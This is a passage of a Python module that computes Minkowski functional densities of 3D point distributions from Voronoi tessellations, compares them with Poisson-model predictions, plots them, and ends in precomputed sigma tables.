        tottime = time.time()-ttttime
        print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
        return VC, boundinds, M0tot, M1tot, M2tot, M3tot, rboundsforparticle
    if boundary == "mask":
        VC.gen_MF_masked(normsize)
        return VC, boundinds, normsize
def getMFTs(rs, rho):  # theoretical from poisson
    """Theoretical Minkowski functional densities of a Poisson (Boolean) model.

    Parameters
    ----------
    rs : ndarray
        Evaluation radii.
    rho : float
        Number density of the point process.

    Returns
    -------
    ndarray of shape (4, len(rs)) with the four functional densities.
    """
    # Single-ball functionals (with the conventional 1/3 normalization).
    ball_volume = 4 * np.pi * rs ** 3 / 3
    ball_area = 2 * np.pi * rs ** 2 / 3
    ball_length = 4 * rs / 3
    ball_chi = 1
    # Void probability factor shared by all four orders.
    decay = np.exp(-rho * ball_volume)
    m0 = 1 - decay
    m1 = 2 * rho * ball_area * decay
    m2 = np.pi * rho * (ball_length - 3 * np.pi * rho * ball_area ** 2 / 8) * decay
    m3 = 4 * np.pi * rho * (ball_chi - 9 * rho * ball_area * ball_length / 2 + 9 * np.pi * rho ** 2 * ball_area ** 3 / 16) * decay / 3
    return np.array([m0, m1, m2, m3])
def interpolatePoissonmSig(rs, rho):
    """Interpolate the precomputed Poisson sigma curves, rescaled to density rho.

    The sigarr* interpolators were tabulated at a mean inter-particle
    distance of 100 (reference density 1.0332793625494781e-06); radii are
    mapped onto that grid and each order gets its dimensional scaling.
    """
    global sigarr0, sigarr1, sigarr2, sigarr3
    rt = rs / (1 / rho) ** (1 / 3) * 100  # precalculated at md=100
    reference_rho = 1.0332793625494781e-06
    scale = (rho / reference_rho) ** (1 / 3)
    # Scalings: order k picks up scale**k.
    return np.array([
        sigarr0(rt),
        sigarr1(rt) * scale,
        sigarr2(rt) * scale ** 2,
        sigarr3(rt) * scale ** 3,
    ])
def plotwithPoissErr(rs, VC, totnum, boundinds, MD0, label="", size=1000):
    """Plot measured functional densities against the Poisson expectation.

    Draws one panel per order (2x2 grid) with the measured points, the
    Poisson curve and a 3-sigma band from the precomputed sigma tables.

    Returns (fig, axs) for further customization.
    """
    # Effective number density of the contributing (non-boundary) particles.
    rho = (totnum - len(boundinds)) / MD0
    MFTs = getMFTs(rs, rho)
    sigs = interpolatePoissonmSig(rs, rho)
    fig = plt.figure(figsize=(22, 15), dpi=200)
    axs = []
    # Removed dead local `w = 0` — the loop variable shadows it immediately.
    for w in range(4):
        ax = fig.add_subplot(int("22" + str(w + 1)))
        axs.append(ax)
        ax.scatter(rs, VC.MFD[:, w], s=5, c="black", label=label)
        ax.fill_between(rs, MFTs[w, :] - 3 * sigs[w, :], MFTs[w, :] + 3 * sigs[w, :],
            color="red", alpha=0.2, label="3 $\\sigma$ region")
        ax.plot(rs, MFTs[w][:], c="blue", lw=1, label="Poisson")
        # Typo fix in the axis label ("Evalutation" -> "Evaluation").
        ax.set_xlabel("Evaluation radius r", fontsize=16)
        ax.set_ylabel("$w_" + str(w) + "$", fontsize=18)
        ax.set_title("N=" + str(totnum) + " L=" + str(size), fontsize=18)
        ax.legend(fontsize=14)
    # m2 and m3 oscillate around zero; clamp their y-range to the theory curve.
    axs[2].set_ylim(np.min(MFTs[2][:]) * 1.1, np.max(MFTs[2][:]) * 1.1)
    axs[3].set_ylim(np.min(MFTs[3][:]) * 1.1, np.max(MFTs[3][:]) * 1.1)
    return fig, axs
def MF3Dplot(rs, VC, totnum, boundinds, normsize):
    """Plot masked-boundary functional densities against the Poisson curves.

    One row per order: left panel overlays the Poisson expectation with a
    clamped y-range, right panel shows the measurement alone.
    """
    neff = totnum - len(boundinds)
    # BUG FIX: getMFTs takes (rs, rho); the old call passed a spurious third
    # argument `neff` and raised TypeError at runtime.
    MFTs = getMFTs(rs, neff / normsize**3)
    fig, axs = plt.subplots(4, 2)
    fig.set_size_inches(15, 5 * (4))
    for i in range(4):
        axs[i, 0].scatter(rs, VC.MFD[:, i], s=1, label="M-" + str(i))
        axs[i, 0].plot(rs, MFTs[i], lw=1, c="blue", label="M-" + str(i))
        axs[i, 0].set_xlabel("R")
        axs[i, 0].set_ylabel("Functional Values over " + str(normsize) + "^3")
        axs[i, 0].legend()
        # Keep a 15% margin around the theoretical curve.
        mar = 0.15 * (np.max(MFTs[i]) - np.min(MFTs[i]))
        axs[i, 0].set_ylim(np.min(MFTs[i]) - mar, np.max(MFTs[i]) + mar)
        axs[i, 1].scatter(rs, VC.MFD[:, i], s=1, label="M-" + str(i))
        axs[i, 1].set_xlabel("R")
        axs[i, 1].set_ylabel("Normalized Functional Values")
        axs[i, 1].legend()
def MF3Dplotopt(rs, VC, totnum, boundinds, MD0):
    """Plot optimal-boundary functional densities and their reduced forms.

    Left column: densities vs. the Poisson expectation. Right column: the
    same data divided by C_chi * r**(3-i) ("reduced" densities).
    """
    neff = totnum - len(boundinds)
    MFTs = getMFTs(rs, neff / MD0)
    fig, axs = plt.subplots(4, 2)
    fig.set_dpi(200)
    fig.set_size_inches(18, 5 * (4))
    for i in range(4):
        axs[i, 0].scatter(rs, VC.MFD[:, i], s=1, label="m" + str(i))
        axs[i, 0].plot(rs, MFTs[i], lw=1, c="blue", label="m" + str(i))
        axs[i, 0].set_xlabel("r")
        axs[i, 0].set_ylabel("Functional Densities")
        axs[i, 0].legend()
        mar = 0.15 * (np.max(MFTs[i]) - np.min(MFTs[i]))
        axs[i, 0].set_ylim(np.min(MFTs[i]) - mar, np.max(MFTs[i]) + mar)
        # Hoisted: the reduced theory curve was recomputed four times per
        # panel in the original loop body.
        reduced = MFTs[i] / (C_chi * rs ** (3 - i))
        axs[i, 1].scatter(rs, VC.MFD[:, i] / (C_chi * rs ** (3 - i)), s=1, label="M-" + str(i))
        axs[i, 1].plot(rs, reduced, lw=1, c="blue", label="m" + str(i))
        rmar = 0.15 * (np.max(reduced) - np.min(reduced))
        axs[i, 1].set_ylim(np.min(reduced) - rmar, np.max(reduced) + rmar)
        axs[i, 1].set_xlabel("r")
        axs[i, 1].set_ylabel("Reduced Functional Density Values")
        axs[i, 1].legend()
def plotMF(rs, MFD, totnum, boundinds, MD0):
    """Plot precomputed functional densities `MFD` against the Poisson expectation."""
    neff = totnum - len(boundinds)
    MFTs = getMFTs(rs, neff / MD0)  # theoretical Poisson curves
    fig, axs = plt.subplots(4, 2)
    fig.set_size_inches(15, 20)
    for order in range(4):
        tag = "M-" + str(order)
        left, right = axs[order, 0], axs[order, 1]
        left.scatter(rs, MFD[:, order], s=1, label=tag)
        left.plot(rs, MFTs[order], lw=1, c="blue", label=tag)
        left.set_xlabel("R")
        left.set_ylabel("Functional Values over " + str(MD0))
        left.legend()
        # 15% margin around the theoretical curve.
        margin = 0.15 * (np.max(MFTs[order]) - np.min(MFTs[order]))
        left.set_ylim(np.min(MFTs[order]) - margin, np.max(MFTs[order]) + margin)
        right.scatter(rs, MFD[:, order], s=1, label=tag)
        right.set_xlabel("R")
        right.set_ylabel("Normalized Functional Values")
        right.legend()
def quietMF3D(rs, points, size):
    """Full optimal-boundary Minkowski functional pipeline without progress output.

    Builds the Voronoi diagram itself (unlike MinkFunc3d, which takes one),
    uses the quiet VCellsq class, and records stage timings in `tlog`.

    Returns (VC, boundinds, MD0, [rtimewprMFs, rtimesum], tlog).
    """
    global rtimewprMFs, rtimesum
    rtimewprMFs = []
    rtimesum = []
    tlog = []
    ttttime = time.time()
    st = time.time()
    vor = Voronoi(points)
    tlog.append(time.time()-st)
    st = time.time()
    totnum = len(points)
    # Particles whose cell is unbounded or reaches outside the box are
    # excluded from the functional sums.
    boundinds = []
    contributingwalls = {}
    for i, pt in enumerate(points):
        if any([w == -1 for w in vor.regions[vor.point_region[i]]]):
            boundinds.append(i)
            continue
        if any([(v[0] < 0 or v[0] > size or v[1] < 0 or v[1] > size or v[2] < 0 or v[2] > size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
            boundinds.append(i)
            continue
    VC = VCellsq()
    wallidit = 0
    boundedges = {}
    boundwalls = {}
    # Register every ridge as a wall; boundary-to-interior walls and their
    # edges are recorded (boundwalls/boundedges are built but not consumed here).
    for ptinds, wall in vor.ridge_dict.items():
        d = dist(points[ptinds[0]], points[ptinds[1]])
        VC.add_wall(wallidit, ptinds, wall, d, [points[ptinds[0]], points[ptinds[1]]])
        if (ptinds[0] in boundinds):
            if ptinds[1] not in boundinds:
                boundwalls[wallidit] = True
                for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                    boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[1]]-points[ptinds[0]]), d, dist(*vor.vertices[[*edgeinds]])))
        if (ptinds[1] in boundinds):
            if ptinds[0] not in boundinds:
                boundwalls[wallidit] = True
                for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                    boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[0]]-points[ptinds[1]]), d, dist(*vor.vertices[[*edgeinds]])))
        wallidit += 1
    VC.gen_wall_lists(totnum)
    tlog.append(time.time()-st)
    st = time.time()
    wls = VC.walllists
    verts = vor.vertices
    contributingwalls = {}
    for i, pt in enumerate(points):
        if i in boundinds:
            continue
        for idd in wls[i]:
            contributingwalls[idd] = True
    VC.gen_wall_params(vor, contributingwalls)  # contributing for at least one
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_ptrcellvol(totnum, contributingwalls)  # contributing for at least one
    # MD0: total volume of the interior cells (the observation window).
    MD0 = 0
    st = time.time()
    for i, pt in enumerate(points):
        if i in boundinds:
            continue
        MD0 += VC.ptrcellvol[i]
    tlog.append(time.time()-st)
    st = time.time()
    # Per-particle trivial-case radius bounds for the accelerator.
    rboundsforparticle = [[], []]
    st = time.time()
    for i, point in enumerate(points):
        if i in boundinds:  # boundforalls
            rboundsforparticle[0].append(size)
            rboundsforparticle[1].append(0)
            continue
        rmin = size
        rmax = 0
        # print(i)
        for idd in wls[i]:
            thismin = VC.wallparams[idd][0]/2
            # print(idd)
            thismax = VC.wallparams[idd][3]
            if rmin >= thismin:
                rmin = thismin
            if rmax <= thismax:
                rmax = thismax
        rboundsforparticle[0].append(rmin)  # only make for valid particles
        rboundsforparticle[1].append(rmax)
    accelerator = [{}, {}]
    for ptinds, idd in VC.pointstowall.items():
        # print(ptinds,idd)
        accelerator[0][idd] = min(rboundsforparticle[0][ptinds[0]], rboundsforparticle[0][ptinds[1]])
        accelerator[1][idd] = max(rboundsforparticle[1][ptinds[0]], rboundsforparticle[1][ptinds[1]])
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_wprMFs(rs, contributingwalls, accelerate=True, accelerator=accelerator)
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_pMF(rs, totnum, boundinds, accelerate=True, ptrbound=rboundsforparticle)
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_MF(MD0)
    tlog.append(time.time()-st)
    st = time.time()
    tottime = time.time()-ttttime
    tlog.append(tottime)
    print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
    return VC, boundinds, MD0, [rtimewprMFs, rtimesum], tlog
def MinkowskiFunctional(rs, points, size):
    """Optimal-boundary Minkowski functional pipeline with progress output.

    Same computation as quietMF3D (Voronoi construction, boundary exclusion,
    wall parameters, accelerated per-wall and per-particle functionals),
    with stage progress printed along the way.

    Returns (VC, boundinds, MD0, [rtimewprMFs, rtimesum], tlog).
    """
    global rtimewprMFs, rtimesum
    rtimewprMFs = []
    rtimesum = []
    tlog = []
    ttttime = time.time()
    st = time.time()
    vor = Voronoi(points)
    tlog.append(time.time()-st)
    st = time.time()
    totnum = len(points)
    boundinds = []
    contributingwalls = {}
    print("Evaluating boundaries")
    # Exclude particles with unbounded cells or cells leaving the box.
    for i, pt in enumerate(points):
        if any([w == -1 for w in vor.regions[vor.point_region[i]]]):
            boundinds.append(i)
            continue
        if any([(v[0] < 0 or v[0] > size or v[1] < 0 or v[1] > size or v[2] < 0 or v[2] > size) for v in vor.vertices[vor.regions[vor.point_region[i]]]]):
            boundinds.append(i)
            continue
    VC = VCellsq()
    wallidit = 0
    boundedges = {}
    boundwalls = {}
    for ptinds, wall in vor.ridge_dict.items():
        d = dist(points[ptinds[0]], points[ptinds[1]])
        VC.add_wall(wallidit, ptinds, wall, d, [points[ptinds[0]], points[ptinds[1]]])
        if (ptinds[0] in boundinds):
            if ptinds[1] not in boundinds:
                boundwalls[wallidit] = True
                for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                    boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[1]]-points[ptinds[0]]), d, dist(*vor.vertices[[*edgeinds]])))
        if (ptinds[1] in boundinds):
            if ptinds[0] not in boundinds:
                boundwalls[wallidit] = True
                for i, edgeinds in enumerate(vertstoedgesorted(wall)):
                    boundedges.setdefault(edgeinds, []).extend((np.array(points[ptinds[0]]-points[ptinds[1]]), d, dist(*vor.vertices[[*edgeinds]])))
        wallidit += 1
    VC.gen_wall_lists(totnum)
    tlog.append(time.time()-st)
    st = time.time()
    wls = VC.walllists
    verts = vor.vertices
    contributingwalls = {}
    for i, pt in enumerate(points):
        if i in boundinds:
            continue
        for idd in wls[i]:
            contributingwalls[idd] = True
    print("Generating Wall Parameters")
    VC.gen_wall_params(vor, contributingwalls)  # contributing for at least one
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_ptrcellvol(totnum, contributingwalls)  # contributing for at least one
    # MD0: total volume of the interior cells (the observation window).
    MD0 = 0
    st = time.time()
    for i, pt in enumerate(points):
        if i in boundinds:
            continue
        MD0 += VC.ptrcellvol[i]
    tlog.append(time.time()-st)
    st = time.time()
    rboundsforparticle = [[], []]
    st = time.time()
    print("Preparing Accelerator")
    for i, point in enumerate(points):
        if i in boundinds:  # boundforalls
            rboundsforparticle[0].append(size)
            rboundsforparticle[1].append(0)
            continue
        rmin = size
        rmax = 0
        # print(i)
        for idd in wls[i]:
            thismin = VC.wallparams[idd][0]/2
            # print(idd)
            thismax = VC.wallparams[idd][3]
            if rmin >= thismin:
                rmin = thismin
            if rmax <= thismax:
                rmax = thismax
        rboundsforparticle[0].append(rmin)  # only make for valid particles
        rboundsforparticle[1].append(rmax)
    accelerator = [{}, {}]
    for ptinds, idd in VC.pointstowall.items():
        # print(ptinds,idd)
        accelerator[0][idd] = min(rboundsforparticle[0][ptinds[0]], rboundsforparticle[0][ptinds[1]])
        accelerator[1][idd] = max(rboundsforparticle[1][ptinds[0]], rboundsforparticle[1][ptinds[1]])
    tlog.append(time.time()-st)
    st = time.time()
    print("Wall Functional Calculation")
    VC.gen_wprMFs(rs, contributingwalls, accelerate=True, accelerator=accelerator)
    tlog.append(time.time()-st)
    st = time.time()
    print("Summing over walls")
    VC.gen_pMF(rs, totnum, boundinds, accelerate=True, ptrbound=rboundsforparticle)
    tlog.append(time.time()-st)
    st = time.time()
    VC.gen_MF(MD0)
    tlog.append(time.time()-st)
    st = time.time()
    tottime = time.time()-ttttime
    tlog.append(tottime)
    print("Grand Sum Time: "+str(tottime)+" in rough, "+str(tottime/((totnum-len(boundinds))*len(rs)))+" per particle per radius.")
    return VC, boundinds, MD0, [rtimewprMFs, rtimesum], tlog
class VCellsq:
    """Quiet Voronoi-cell container for Minkowski functional computation.

    Holds the walls (ridges) of a Voronoi tessellation keyed by an integer
    wall id, and computes per-wall, per-particle, and total functionals.

    wallparams[idd] layout after gen_wall_params:
    [0] inter-point distance d, [1] the two generating points, [2] full solid
    angle, [3] max vertex distance, [4] wall area, [5] 3D vertex distances,
    [6] distance to plane dtp, [7] per-edge solid angles, [8] per-edge
    distances dte, [9] (theta, sin, cos) per edge, [10] 2D vertex norms,
    [11] per-edge crossing flags, [12] (2D vertices, inside-flag).
    """
    def __init__(self):
        # (i, j) particle-index pair -> wall id
        self.pointstowall = {}
        # edge -> list of adjacent-wall distances (3 per interior edge)
        self.adjm = {}
        # edge -> number of walls sharing it
        self.edgecounter = {}
        # wall id -> list of Voronoi vertex indices
        self.walls = {}
        # wall id -> parameter list (see class docstring)
        self.wallparams = {}
    def add_wall(self, idd, ptinds, wall, d, tpoints):
        """Register one Voronoi ridge; walls touching vertex -1 (unbounded) are skipped."""
        offflag = False
        if any([x == -1 for x in wall]):
            offflag = True
        # Canonical ordering of the particle-index pair.
        if ptinds[0] <= ptinds[1]:
            ind = (ptinds[0], ptinds[1])
        else:
            ind = (ptinds[1], ptinds[0])
        if not offflag:
            self.pointstowall[ind] = idd
            self.walls[idd] = wall
            self.wallparams[idd] = [d, tpoints]
            for edgeinds in vertstoedgesorted(wall):
                if not edgeinds in self.edgecounter:
                    self.edgecounter[edgeinds] = 1
                else:
                    self.edgecounter[edgeinds] += 1
                self.adjm.setdefault(edgeinds, []).append(d)
    def gen_wall_lists(self, size):
        """Build walllists: per-particle list of adjacent wall ids (idempotent)."""
        try:
            # Already built — nothing to do.
            self.walllists
            return
        except:
            self.walllists = [[] for _ in range(size)]
        st = time.time()
        for pinds, wallidd in self.pointstowall.items():
            self.walllists[pinds[0]].append(wallidd)
            self.walllists[pinds[1]].append(wallidd)
    def gen_wall_params(self, vor, contributingwalls=None):
        """Compute the geometric parameters of each (contributing) wall.

        Projects each wall polygon into its own plane and derives the solid
        angle, area, per-edge distances/angles and crossing flags consumed
        by getrMF. Extends wallparams[idd] in place (see class docstring).
        """
        st = time.time()
        waltotnum = len(self.walls)
        for idd, wall in self.walls.items():
            if not contributingwalls == None:
                if idd not in contributingwalls:
                    continue
            x = self.wallparams[idd][1][0]
            y = self.wallparams[idd][1][1]
            verts = vor.vertices[wall]
            maxrforwall = 0
            vertdists = []
            for vert in verts:
                dt = dist(x, vert)
                vertdists.append(dt)
                if dt > maxrforwall:
                    maxrforwall = dt
            # Plane of the wall: normal n, offset d (midplane of x and y).
            n = x-y
            d = -n.dot(x+y)/2
            dtp, h = disttoplane(x, n, d)
            verts2d, inside, thets = convcoor(normvec(n), h, verts)
            wallarea = polarea2d(verts2d)
            vert2dnorms = []
            for vert2d in verts2d:
                vert2dnorms.append(norm(vert2d))
            solangs = []
            dtes = []
            thetas = []
            sss = []
            for i, (edge2d, thet2) in enumerate(zip(verttoedges(verts2d), verttoedges(thets))):
                nop, c = getline_abc(edge2d)
                nopnormsq = np.einsum('i,i', nop, nop)
                nopnorm = np.sqrt(nopnormsq)
                # dte: distance from the in-plane origin to the edge line.
                dte = np.abs(c)/nopnorm
                dtes.append(dte)
                theta = thet2[1]-thet2[0]
                if inside:  # detect crossing at pi
                    if theta < -np.pi:
                        theta += 2*np.pi
                    elif theta > np.pi:
                        theta -= 2*np.pi
                s = np.abs(np.sin(theta))
                ccos = np.cos(theta)
                thetas.append((theta, s, ccos))
                # ss flag: True when the foot of the perpendicular lies
                # outside the edge segment.
                xdet = -nop[0]*c/nopnormsq
                if (xdet > edge2d[0][0] and xdet < edge2d[1][0]) or (xdet < edge2d[0][0] and xdet > edge2d[1][0]):
                    sss.append(False)
                else:
                    sss.append(True)
                if theta >= 0:
                    solangs.append(zfastsolang(dtp, vert2dnorms[i-1], vert2dnorms[i], vertdists[i-1], vertdists[i], s, ccos))
                else:
                    solangs.append(-zfastsolang(dtp, vert2dnorms[i-1], vert2dnorms[i], vertdists[i-1], vertdists[i], s, ccos))
            fullsolang = np.abs(np.sum(solangs))
            self.wallparams[idd].extend((fullsolang, maxrforwall, wallarea, vertdists, dtp, solangs, dtes, thetas, vert2dnorms, sss, (verts2d, inside)))
    def gen_ptrcellvol(self, size, contributingwalls):
        """Accumulate each particle's cell volume from its wall pyramids (area*dtp/3)."""
        self.ptrcellvol = [0 for _ in range(size)]
        st = time.time()
        for pinds, idd in self.pointstowall.items():
            if idd not in contributingwalls:
                continue
            thisvol = self.wallparams[idd][4]*self.wallparams[idd][6]/3.
            self.ptrcellvol[pinds[0]] += thisvol
            self.ptrcellvol[pinds[1]] += thisvol
    def gen_wprMFs(self, rs, contributingwalls=None, accelerate=False, accelerator=None):  # one-side computation
        """Evaluate getrMF for every wall and radius, skipping trivial radii.

        With accelerate=True, walls whose accelerator bounds show the radius
        is trivially below/above the relevant range are skipped entirely.
        """
        global rtimewprMFs
        self.wprMFs = [{} for _ in range(len(rs))]
        n = len(self.walls)
        if accelerate:
            if accelerator == None:
                assert False, "No Accelerator given"
        st = time.time()
        for i, r in enumerate(rs):
            freestoadd = 0
            stt = time.time()
            for idd, wall in self.walls.items():
                if not contributingwalls == None:
                    if idd not in contributingwalls:
                        continue
                if accelerate and (accelerator[0][idd] > r or accelerator[1][idd] < r):
                    continue
                else:
                    # Adjacent-wall distance triples for each edge of the wall.
                    dstosend = []
                    for edgeinds in vertstoedgesorted(wall):
                        if len(self.adjm[edgeinds]) != 3:
                            print("NOT 3-cell edge: ", edgeinds, self.adjm[edgeinds], wall)
                        dstosend.append(self.adjm[edgeinds])
                    self.wprMFs[i][idd] = getrMF(idd, r, self.wallparams[idd], dstosend)
            rtime = time.time()-stt
            rtimewprMFs.append(rtime)
    def gen_pMF(self, rs, totnum, boundinds, accelerate=False, ptrbound=None):
        """Sum per-wall functionals into per-particle functionals pMF.

        pMF has shape (len(rs), totnum, 4), initialized to NaN as a "not
        computed" marker; boundary particles are set to zero. With
        accelerate=True, radii below a particle's rmin give free-ball terms
        and radii above rmax give the full cell volume.
        """
        global rtimesum
        self.pMF = np.full((len(rs), totnum, 4), np.nan)
        if accelerate:
            if ptrbound == None:
                assert False, "No ptrbound or ptrcellvol given."
        st = time.time()
        ttt = 0
        for ir, r in enumerate(rs):
            stt = time.time()
            contpartind = 0
            for i in range(totnum):
                if i in boundinds:
                    self.pMF[ir, i, 0] = 0
                    self.pMF[ir, i, 1] = 0
                    self.pMF[ir, i, 2] = 0
                    self.pMF[ir, i, 3] = 0
                    continue
                stt = time.time()
                if accelerate and ptrbound[0][i] >= r:
                    # Ball entirely inside the cell: free-ball functionals.
                    self.pMF[ir, i, 0] = C_chi*r**3
                    self.pMF[ir, i, 1] = C_chi*r**2
                    self.pMF[ir, i, 2] = C_chi*r
                    self.pMF[ir, i, 3] = C_chi
                    contpartind += 1
                    continue
                if accelerate and ptrbound[1][i] <= r:
                    # Cell fully covered: only the cell volume remains.
                    self.pMF[ir, i, 0] = self.ptrcellvol[i]
                    self.pMF[ir, i, 1] = 0
                    self.pMF[ir, i, 2] = 0
                    self.pMF[ir, i, 3] = 0
                    contpartind += 1
                    continue
                M0 = 0
                M1 = 0
                M2 = 0
                M3 = 0
                for idd in self.walllists[i]:
                    addval = self.wprMFs[ir][idd]
                    M0 += addval[0]
                    M1 += addval[1]
                    M2 += addval[1]/r-addval[2]/2.  # Non trivial - sign!! divided by two sheels-> 1/2 factor
                    M3 += addval[1]/r**2-addval[3]/2.+addval[4]/6.  # non trivial 1/6 each edge section is accessed 6 times, 2 times per cell
                self.pMF[ir, i, 0] = M0
                self.pMF[ir, i, 1] = M1
                self.pMF[ir, i, 2] = M2
                self.pMF[ir, i, 3] = M3
                contpartind += 1
            # Sanity check: every particle was handled exactly once.
            if contpartind+len(boundinds) != totnum:
                assert False, "Wrong adding"
            rtime = time.time()-stt
            rtimesum.append(rtime)
    def gen_MF(self, MD0):
        """Sum pMF over particles and normalize each order by the window volume MD0."""
        copiedpMF = np.nan_to_num(self.pMF)  # to remove nan indicators
        self.MF = np.sum(copiedpMF, axis=1)
        self.MFD = self.MF.copy()
        for i in range(4):  # principal kinematical formula
            if i == 0:
                self.MFD[:, i] = self.MF[:, i]/MD0
            if i == 1:
                self.MFD[:, i] = self.MF[:, i]/MD0
            if i == 2:
                self.MFD[:, i] = self.MF[:, i]/MD0
            if i == 3:
                self.MFD[:, i] = self.MF[:, i]/MD0
        print("Total MF generated")
    def gen_MF_masked(self, normsize):
        """Sum pMF over particles and normalize by the masked window volume normsize**3."""
        copiedpMF = np.nan_to_num(self.pMF)  # to remove nan indicators
        self.MF = np.sum(copiedpMF, axis=1)
        self.MFD = self.MF.copy()
        for i in range(4):  # principal kinematical formula
            self.MFD[:, i] = self.MF[:, i]/normsize**3
    def checkcount4(self):
        """Return how many edges are shared by more than three walls."""
        count = 0
        for _, val in self.edgecounter.items():
            if val > 3:
                count += 1
        return count
    def plotwall(self, idd, r=None):
        """Plot the 2D projection of wall `idd`, optionally with a circle of radius r."""
        fig = plt.figure(figsize=(8, 8))
        ax = fig.add_subplot(111, aspect="equal")
        First = 0
        # First two vertices get larger markers to show traversal direction.
        for vert in self.wallparams[idd][12][0]:
            if First == 0:
                ax.scatter(*vert.T, s=50, c="green")
                First += 1
                continue
            elif First == 1:
                ax.scatter(*vert.T, s=25, c="green")
                First += 1
                continue
            ax.scatter(*vert.T, s=1, c="green")
        for edge in verttoedges(self.wallparams[idd][12][0]):
            ax.plot(*edge.T, lw=1, c="orange")
        ax.scatter([0, 0], [0, 0], s=3, c="red")
        if not r == None:
            circle1 = plt.Circle([0, 0], r, color='red', fill=False)
            ax.add_artist(circle1)
# Precomputed Poisson sigma tables, sampled on PREVALrs at a reference mean
# inter-particle distance of 100 (used by interpolatePoissonmSig; one table
# per functional order 0-3).
PREVALrs=np.array([1.0000000000000002 ,5.0769230769230775 ,9.153846153846155 ,13.230769230769234 ,17.30769230769231 ,21.384615384615387 ,25.461538461538467 ,29.538461538461544 ,33.61538461538462 ,37.6923076923077 ,41.769230769230774 ,45.846153846153854 ,49.923076923076934 ,54.00000000000001 ,58.07692307692309 ,62.15384615384616 ,66.23076923076924 ,70.30769230769232 ,74.3846153846154 ,78.46153846153847 ,82.53846153846155 ,86.61538461538463 ,90.69230769230771 ,94.76923076923079 ,98.84615384615387 ,102.92307692307693 ,107.00000000000001 ,111.0769230769231 ,115.15384615384617 ,119.23076923076925 ,123.30769230769232 ,127.3846153846154 ,131.46153846153848 ,135.53846153846155 ,139.61538461538464 ,143.6923076923077 ,147.7692307692308 ,151.84615384615387 ,155.92307692307693 ,160.00000000000003])
PREVALsig0=np.array([9.30462176053738e-08 ,1.2164382893896889e-05 ,7.11580009464479e-05 ,0.00021366816352618345 ,0.00047339948426560114 ,0.0008784927342966256 ,0.0014492630911988433 ,0.00218903610691815 ,0.0030855998475815155 ,0.004117876422575952 ,0.005250331571820094 ,0.006410840682562735 ,0.007523198493887959 ,0.008516351435331061 ,0.009314483117036997 ,0.00984079546588061 ,0.010064106041359875 ,0.009955977718339285 ,0.009516307085349915 ,0.008784272407092846 ,0.007828170837876977 ,0.0067406857319440155 ,0.005611590573025235 ,0.004519911040650017 ,0.0035241229961765173 ,0.002661674049005517 ,0.0019514477741987815 ,0.0013892386866401335 ,0.0009586740776102773 ,0.0006424760908948394 ,0.0004190694740504398 ,0.0002674488657161619 ,0.00016809828236140587 ,0.00010538962123491593 ,6.723127960685978e-05 ,4.460444384213704e-05 ,3.092263016049216e-05 ,2.201595960806179e-05 ,1.5811746979260698e-05 ,1.1343990423038426e-05])
PREVALsig1=np.array([6.205482265997426e-08 ,1.5964453796324757e-06 ,5.178534591558683e-06 ,1.0721707063632344e-05 ,1.8084354041941446e-05 ,2.7055983864657494e-05 ,3.7245596467963366e-05 ,4.7632405378711977e-05 ,5.805404155886676e-05 ,6.854895537751146e-05 ,7.750427106285083e-05 ,8.424154272426719e-05 ,8.950204693835649e-05 ,9.396238639894009e-05 ,9.754426868844942e-05 ,0.00010147047945357129 ,0.00010519221832255606 ,0.0001111016416550677 ,0.0001175664071604494 ,0.00012295250645925624 ,0.00012462362905966837 ,0.00012120099778592739 ,0.00011310687418981412 ,0.00010123547239255929 ,8.734538311048294e-05 ,7.230024873535402e-05 ,5.730288846404285e-05 ,4.400490801993274e-05 ,3.2798373057837294e-05 ,2.351238500125073e-05 ,1.6219811775974408e-05 ,1.0779697704629692e-05 ,7.071550705881196e-06 ,4.458749748534594e-06 ,2.7497114217189247e-06 ,1.649967683203292e-06 ,1.0301121821781645e-06 ,6.698563309830148e-07 ,4.6583346050687896e-07 ,3.32528592831236e-07])
PREVALsig2=np.array([3.1049734658241755e-08 ,1.578781184586323e-07 ,2.930204442299182e-07 ,4.436663523959398e-07 ,6.350693355299665e-07 ,8.764135617970062e-07 ,1.152498000103475e-06 ,1.4723687712133555e-06 ,1.792300080517532e-06 ,2.0831222543505688e-06 ,2.357229933581647e-06 ,2.5620671392075264e-06 ,2.766214354189731e-06 ,2.8043623209988936e-06 ,2.8803547494717237e-06 ,2.8469831281913246e-06 ,2.8184544131534166e-06 ,2.816877169803228e-06 ,2.6744025653853145e-06 ,2.447635439327259e-06 ,2.1344606672503535e-06 ,1.863428322712351e-06 ,1.6969241289109173e-06 ,1.5763878965798777e-06 ,1.5243877384998714e-06 ,1.398867242324998e-06 ,1.257716178672753e-06 ,1.0404616747478394e-06 ,8.635345595113669e-07 ,6.801082391944476e-07 ,5.163847315459505e-07 ,3.7403457982187703e-07 ,2.5875438814312876e-07 ,1.774648075731325e-07 ,1.196881815491917e-07 ,7.632062375331184e-08 ,4.621024206666922e-08 ,2.7662927906730037e-08 ,1.809344782899971e-08 ,1.2811760195453316e-08])
